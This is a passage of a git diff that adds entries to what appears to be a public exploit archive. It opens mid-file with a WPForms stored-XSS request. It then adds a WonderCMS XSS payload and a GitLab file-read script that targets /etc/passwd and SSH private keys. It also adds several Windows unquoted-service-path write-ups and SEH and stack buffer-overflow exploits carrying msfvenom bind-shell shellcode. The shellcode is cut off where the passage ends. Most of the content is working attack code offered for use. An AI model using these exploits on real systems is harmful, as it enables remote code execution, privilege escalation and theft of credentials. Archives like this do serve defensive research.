+action=wpforms_save_form&data=[{"name":"id","value":"990"},{"name":"field_id","value":"5"},{"name":"fields[0][id]","value":"0"},{"name":"fields[0][type]","value":"name"},{"name":"fields[0][label]","value":"Nom"},{"name":"fields[0][format]","value":"first-last"},{"name":"fields[0][description]","value":"<script>alert(1)</script>"},{"name":"fields[0][required]","value":"1"},{"name":"fields[0][size]","value":"medium"},{"name":"fields[0][simple_placeholder]","value":""},{"name":"fields[0][simple_default]","value":""},{"name":"fields[0][first_placeholder]","value":""},{"name":"fields[0][first_default]","value":""},{"name":"fields[0][middle_placeholder]","value":""},{"name":"fields[0][middle_default]","value":""},{"name":"fields[0][last_placeholder]","value":""},{"name":"fields[0][last_default]","value":""},{"name":"fields[0][css]","value":""},{"name":"fields[1][id]","value":"1"},{"name":"fields[1][type]","value":"email"},{"name":"fields[1][label]","value":"E-mail"},{"name":"fields[1][description]","value":""},{"name":"fields[1][required]","value":"1"},{"name":"fields[1][size]","value":"medium"},{"name":"fields[1][placeholder]","value":""},{"name":"fields[1][confirmation_placeholder]","value":""},{"name":"fields[1][default_value]","value":""},{"name":"fields[1][css]","value":""},{"name":"fields[1][filter_type]","value":""},{"name":"fields[1][allowlist]","value":""},{"name":"fields[1][denylist]","value":""},{"name":"fields[2][id]","value":"2"},{"name":"fields[2][type]","value":"textarea"},{"name":"fields[2][label]","value":"Commentaire ou message"},{"name":"fields[2][description]","value":""},{"name":"fields[2][required]","value":"1"},{"name":"fields[2][size]","value":"medium"},{"name":"fields[2][placeholder]","value":""},{"name":"fields[2][limit_count]","value":"1"},{"name":"fields[2][limit_mode]","value":"characters"},{"name":"fields[2][default_value]","value":""},{"name":"fields[2][css]","value":""},{"name":"fields[3][id]","value":"3"},{"name":"fields[3][type]","value":"textarea"},{"name":"fields[3][label]","value":"Paragraphe"},{"name":"fields[3][description]","value":""},{"name":"fields[3][size]","value":"medium"},{"name":"fields[3][placeholder]","value":""},{"name":"fields[3][limit_count]","value":"1"},{"name":"fields[3][limit_mode]","value":"characters"},{"name":"fields[3][default_value]","value":""},{"name":"fields[3][css]","value":""},{"name":"fields[4][id]","value":"4"},{"name":"fields[4][type]","value":"textarea"},{"name":"fields[4][label]","value":"Paragraphe"},{"name":"fields[4][description]","value":""},{"name":"fields[4][size]","value":"medium"},{"name":"fields[4][placeholder]","value":""},{"name":"fields[4][limit_count]","value":"1"},{"name":"fields[4][limit_mode]","value":"characters"},{"name":"fields[4][default_value]","value":""},{"name":"fields[4][css]","value":""},{"name":"settings[form_title]","value":"Formulaire de contact simple"},{"name":"settings[form_desc]","value":""},{"name":"settings[form_class]","value":""},{"name":"settings[submit_text]","value":"Envoyer"},{"name":"settings[submit_text_processing]","value":"Envoi..."},{"name":"settings[submit_class]","value":""},{"name":"settings[antispam]","value":"1"},{"name":"settings[notification_enable]","value":"1"},{"name":"settings[notifications][1][email]","value":"{admin_email}"},{"name":"settings[notifications][1][subject]","value":"Nouvelle entrée : Formulaire de contact simple"},{"name":"settings[notifications][1][sender_name]","value":"Le Blog de ZwX"},{"name":"settings[notifications][1][sender_address]","value":"{admin_email}"},{"name":"settings[notifications][1][replyto]","value":"{field_id=\"1\"}"},{"name":"settings[notifications][1][message]","value":"{all_fields}"},{"name":"settings[confirmations][1][type]","value":"message"},{"name":"settings[confirmations][1][message]","value":"<p>Merci de nous avoir contacté ! Nous vous contacterons rapidement.</p>"},{"name":"settings[confirmations][1][message_scroll]","value":"1"},{"name":"settings[confirmations][1][page]","value":"262"},{"name":"settings[confirmations][1][redirect]","value":""}]&id=990&nonce=ec15a26a5a
+
+
+# URL Proof Of Concept #
+
+http://localhost/?wpforms_form_preview=990
\ No newline at end of file
diff --git a/exploits/php/webapps/49085.txt b/exploits/php/webapps/49085.txt
new file mode 100644
index 000000000..c500e6d38
--- /dev/null
+++ b/exploits/php/webapps/49085.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
+# Date: 20-11-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://www.wondercms.com/
+# Version: 3.1.3
+# Tested on: Windows 10/Kali Linux
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: Page description.
+
+Steps-To-Reproduce:
+1. Go to the Simple website builder.
+2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
+3. Now go to the website and the XSS will be triggered.
+
+POST /demo/ HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 196
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+DNT: 1
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept: */*
+Origin: 127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: 127.0.0.1/demo/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925
+
+fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49076.py b/exploits/ruby/webapps/49076.py
new file mode 100755
index 000000000..7e21d22f6
--- /dev/null
+++ b/exploits/ruby/webapps/49076.py
@@ -0,0 +1,68 @@
+# Exploit Title: Gitlab 12.9.0 - Arbitrary File Read (Authenticated)
+# Google Dork: -
+# Date: 11/15/2020
+# Exploit Author: Jasper Rasenberg
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Kali Linux 2020.3
+
+
+
+#You can create as many personal access tokens as you like from your GitLab profile.
+#   Sign in to GitLab.
+#    In the upper-right corner, click your avatar and select Settings.
+#    On the User Settings menu, select Access Tokens.
+#    Choose a name and optional expiry date for the token.
+#    Choose the desired scopes.
+#    Click the Create personal access token button.
+#    Save the personal access token somewhere safe. If you navigate away or refresh your page, and you did not save the token, you must create a new one.
+
+# REFERENCE: https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html
+
+#   pip3 install gitlab
+#   pip3 install requests
+#   Use a client cert to verify SSL or set to False
+
+import os
+import requests
+import json
+from time import sleep
+from gitlab import *
+
+session = requests.Session()
+session.verify = f'{os.getcwd()}/<cert.pem>' # or set session.verify = False
+
+host = ''
+
+def exploit(projectName, issueTitle, files, token):
+
+    gl = Gitlab(host, private_token=token, session=session)
+    gl.auth()
+    p1 = gl.projects.create({'name': f"{projectName}-1"})
+    p2 = gl.projects.create({'name': f"{projectName}-2"})
+
+    for i, f in enumerate(files):
+        stripped_f = f.rstrip('\n')
+        issue = p1.issues.create({ \
+                'title': f"{issueTitle}-{i}",
+                'description': \
+                "![a](/uploads/11111111111111111111111111111111/"\
+                f"../../../../../../../../../../../../../..{stripped_f})"})
+        print(issue.description)
+        sleep(3)
+        try:
+            issue.move(p2.id)
+        except Exception as e:
+            pass
+        sleep(3)
+
+if __name__ == "__main__":
+
+     write_files = ['/etc/passwd', '~/.ssh/id_rsa']
+     with open('senstive_files', 'w') as sens:
+         for file in write_files:
+             sens.write(file)
+
+    files = list(open('sensitive_files', 'r'))
+    exploit('project-1', 'issue-1', files)
\ No newline at end of file
diff --git a/exploits/windows/dos/49083.pl b/exploits/windows/dos/49083.pl
new file mode 100755
index 000000000..2b6ba342b
--- /dev/null
+++ b/exploits/windows/dos/49083.pl
@@ -0,0 +1,31 @@
+# Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
+# Date: November 18, 2020
+# Exploit Author: Vincent Wolterman
+# Vendor Homepage: http://www.internetdownloadmanager.com/
+# Software Link: http://www.internetdownloadmanager.com/download.html
+# Version: 6.38.12
+# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041
+
+# Steps to reproduce crash:
+# 1) Execute provided Perl code
+# 2) Open IDMan_Crash.txt output file
+# 3) Copy contents of text file to clipboard
+# 4) Open Internet Download Manager 6.38
+# 5) From the Menu bar -> Downloads -> Scheduler
+# 6) Check the box for 'Open the following file when done:'
+# 7) Paste the contents of IDMan_Crash.txt into the input field below
+# 8) Click 'Apply' and observe the crash
+
+#!/usr/bin/perl
+
+$baddata = "\x41" x 1302;
+$baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1
+$baddata .= "\x43"x(5000-length($baddata));
+
+$file = "IDMan_Crash.txt";
+open (FILE, '>IDMan_Crash.txt');
+print FILE $baddata;
+close (FILE);
+
+print "Exploit file created [" . $file . "]\n";
+print "Buffer size: " . length($baddata) . "\n";
\ No newline at end of file
diff --git a/exploits/windows/local/49047.txt b/exploits/windows/local/49047.txt
new file mode 100644
index 000000000..f05c75aa0
--- /dev/null
+++ b/exploits/windows/local/49047.txt
@@ -0,0 +1,33 @@
+# Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path
+# Discovery by: IRVIN GIL
+# Discovery Date: 2020-11-14
+# Vendor Homepage:  https://www.kite.com/
+# Tested Version: 1.2020.1113.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 x64 es
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+
+KiteService       KiteService          C:\Program Files\Kite\KiteService.exe           Auto
+
+# Service info:
+
+C:\>sc qc "KiteService"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: KiteService
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : KiteService
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49049.txt b/exploits/windows/local/49049.txt
new file mode 100644
index 000000000..d1b00b05b
--- /dev/null
+++ b/exploits/windows/local/49049.txt
@@ -0,0 +1,35 @@
+# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path
+# Author: Jair Amezcua
+# Date: 2020-11-10
+# Vendor Homepage: https://www.iobit.com
+# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php
+# Version : 13.0.0.157
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# 1. Description:
+# Unquoted service paths in Advanced System Care Service 13  v13.0.0.157 have an unquoted service path.
+
+# PoC
+===========
+
+C:\>sc qc AdvancedSystemCareService13
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: AdvancedSystemCareService13
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe
+        LOAD_ORDER_GROUP   : System Reserved
+        TAG                : 0
+        DISPLAY_NAME       : Advanced SystemCare Service 13
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+
+#Description Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49050.txt b/exploits/windows/local/49050.txt
new file mode 100644
index 000000000..71db3367c
--- /dev/null
+++ b/exploits/windows/local/49050.txt
@@ -0,0 +1,34 @@
+# Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path
+# Author: Jair Amezcua
+# Date: 2020-11-10
+# Vendor Homepage: https://www.logitech.com/es-mx
+# Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750
+# Version : 1.10.3.0
+# Tested on: Windows 10 64bit(EN)
+# CVE : N/A
+
+# 1. Description:
+# Unquoted service paths in Logitech Solar Keyboard Service  v1.10.3.0 have an unquoted service path.
+
+# PoC
+===========
+
+C:\>sc qc L4301_Solar
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: L4301_Solar
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
+        LOAD_ORDER_GROUP   : PlugPlay
+        TAG                : 0
+        DISPLAY_NAME       : Logitech Solar Keyboard Service
+        DEPENDENCIES       : PlugPlay
+        SERVICE_START_NAME : LocalSystem
+
+
+#Description Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49053.txt b/exploits/windows/local/49053.txt
new file mode 100644
index 000000000..5f241c29c
--- /dev/null
+++ b/exploits/windows/local/49053.txt
@@ -0,0 +1,30 @@
+#Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path
+#Exploit Author : Isabel Lopez
+#Exploit Date: 2020-11-13
+#Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html
+#Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx
+#Tested on OS: Windows 8.1 (64bits)
+
+
+# 1. Description
+# Atheros Coex Service Application 8.0.0.255 has an unquoted service path.
+
+# 2. PoC
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """"
+
+ZAtheros Bt&Wlan Coex Agent	ZAtheros Bt&Wlan Coex Agent	C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe    Auto
+
+C:\>sc qc WCAssistantService
+[SC] QueryServiceConfig SUCCES
+
+SERVICE_NAME: WCAssistantService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ZAtheros Bt&Wlan Coex Agent
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48806.txt b/exploits/windows/local/49062.txt
similarity index 96%
rename from exploits/windows/local/48806.txt
rename to exploits/windows/local/49062.txt
index 9f6dbb123..b9fe73d1f 100644
--- a/exploits/windows/local/48806.txt
+++ b/exploits/windows/local/49062.txt
@@ -1,12 +1,11 @@
-# Exploit Title: Internet Explorer 11 - Use-After-Free 
-# Google Dork: if applicable
-# Date: 2020-09-06
-# Exploit Author: Tgroup
-# Vendor Homepage: Microsoft.com
-# Version: IE 11 (REQUIRED)
-# Tested on: Windows 7 x64
+# Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free
+# Date: 2020-05-07
+# Exploit Author: maxpl0it
+# Vendor Homepage: https://www.microsoft.com/
+# Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx
+# Version: IE 8, 9, 10, and 11
+# Tested on: Windows 7 (x64)
 # CVE : CVE-2020-0674
-
 <!DOCTYPE html>
 <html>
     <head>
@@ -15,7 +14,7 @@
 // -------------------------------------------------------------------------------------------------
 //
 // Credits:
-//    Tgroup () - Writing the exploit
+//    maxpl0it (@maxpl0it) - Writing the exploit
 //    Qihoo 360 - Identifying the vulnerability in the wild
 //
 //
@@ -38,7 +37,8 @@
 //           11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64)
 //
 // Further notes:
-//     
+//     Video at https://twitter.com/maxpl0it/status/1253396942048104448
+//
 //     The debug is better viewed in the console. Open Developer Tools and enable debug below.
 //
 //     This is the non-EMET-bypassing version and only handles the stack pivot check and EAF.
diff --git a/exploits/windows/local/49066.txt b/exploits/windows/local/49066.txt
new file mode 100644
index 000000000..2483ad8c6
--- /dev/null
+++ b/exploits/windows/local/49066.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
+# Date: 2020-11-07
+# Exploit Author: Gerardo González
+# Vendor Homepage: https://consumer.huawei.com/mx
+# Software Link: https://consumer.huawei.com/mx
+# Version: 1.0.1.0
+# Tested on: Windows 10 Home Single Language x64 Esp
+
+# Step to discover the unquoted Service:
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
+
+# Service info:
+
+Huawei LCD_Service   LCD_Service    C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe     Auto
+
+C:\Users\gerar>sc qc "LCD_Service"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: LCD_Service
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Huawei LCD_Service
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/49084.pl b/exploits/windows/local/49084.pl
new file mode 100755
index 000000000..ac6c76dbc
--- /dev/null
+++ b/exploits/windows/local/49084.pl
@@ -0,0 +1,75 @@
+# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
+# Date: November 19, 2020
+# Exploit Author: Vincent Wolterman
+# Vendor Homepage: https://www.zortam.com/index.html
+# Software Link: https://www.zortam.com/download.html
+# Version: 27.60
+# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
+
+# Steps to reproduce crash:
+# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
+# 2) Open Zortam_Crash.txt output file
+# 3) Copy contents of text file to clipboard
+# 4) Open Zortam Mp3 Studio
+# 5) From the Menu bar -> File -> New Library
+# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
+# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
+# 8) Click 'OK'
+# 9) Connect to victim machine on port 80
+
+#!/usr/bin/perl
+
+$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
+$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
+
+$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
+
+# 0x10015962 : pop ecx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
+# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
+
+$seh = "\x62\x59\x01\x10"; # seh overwrite
+$nop = "\x90" x 12; # NOP sled
+
+# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
+# Payload size: 355 bytes
+
+$payload =
+"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
+"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
+"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
+"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
+"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
+"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
+"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
+"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
+"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
+"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
+"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
+"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
+"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
+"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
+"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
+"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
+"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
+"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
+"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
+"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
+"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
+"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
+"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
+"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
+"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
+"\x9b\xec\xb0\xa9\x89";
+
+
+$file = "Zortam_Crash.txt";
+open (FILE, '>Zortam_Crash.txt');
+print FILE $baddata;
+print FILE $nseh;
+print FILE $seh;
+print FILE $nop;
+print FILE $payload;
+close (FILE);
+
+print "Exploit file created [" . $file . "]\n";
+print "Buffer size: " . length($baddata) . "\n";
\ No newline at end of file
diff --git a/exploits/windows/local/49086.py b/exploits/windows/local/49086.py
new file mode 100755
index 000000000..4a302f767
--- /dev/null
+++ b/exploits/windows/local/49086.py
@@ -0,0 +1,141 @@
+# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
+# Exploit Author: Paolo Stagno aka VoidSec
+# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
+# Version: 5.2.0.1
+# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
+
+"""
+Usage:              IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
+
+PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
+PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"                   
+FileName         : dsmadmc.exe
+ARCH             : I386
+DotNET           : False
+ASLR             : True
+DEP              : True
+Authenticode     : False
+StrongNaming     : N/A
+SafeSEH          : False
+ControlFlowGuard : False
+HighentropyVA    : False
+"""
+
+# [ buffer                              ]
+# [ 68 byte | EIP | rest of the buffer  ]
+#                   ^_ESP
+"""
+EIP contains normal pattern : 0x33634132 (offset 68)
+ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
+
+JMP ESP Pointers:
+0x028039eb : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x02803d7b : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 
+0x02852c21 : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x0289fbe3 : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x0289fd2f : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+0x028823a9 : push esp # ret 0x04 |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
+"""
+
+#!/usr/bin/python
+import struct
+
+# 4000 bytes
+buff_max_length=800
+eip_offset=68
+"""
+BAD CHARS:	\x00\x08\x09\x0a\x0d\x1a\x1b\x7f
+
+GOOD CHARS: 
+    asciiprint 	\x20-\x7e
+
+MOD CHARS: 
+		\x00 -> \x20
+       ,-----------------------------------------------.
+       | Comparison results:                           |
+       |-----------------------------------------------|
+       |                        80 81 82 83 84 85 86 87| File
+       |                        3f 3f 2c 9f 2c 2e 2b d8| Memory
+    80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
+       |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
+    90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
+       |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
+    a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
+       |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
+    b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
+       |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
+    c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
+       |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
+    d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
+       |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
+    e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
+       |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
+    f0 |f8 f9 fa fb fc fd fe ff                        | File
+       |6f 97 a3 96 81 79 5f 98                        | Memory
+       `-----------------------------------------------'
+"""
+# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
+shellcode =  b""
+shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
+shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
+shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
+shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
+shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
+shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
+shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
+shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
+shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
+shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
+shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
+shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
+shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
+shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
+shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
+shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
+shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
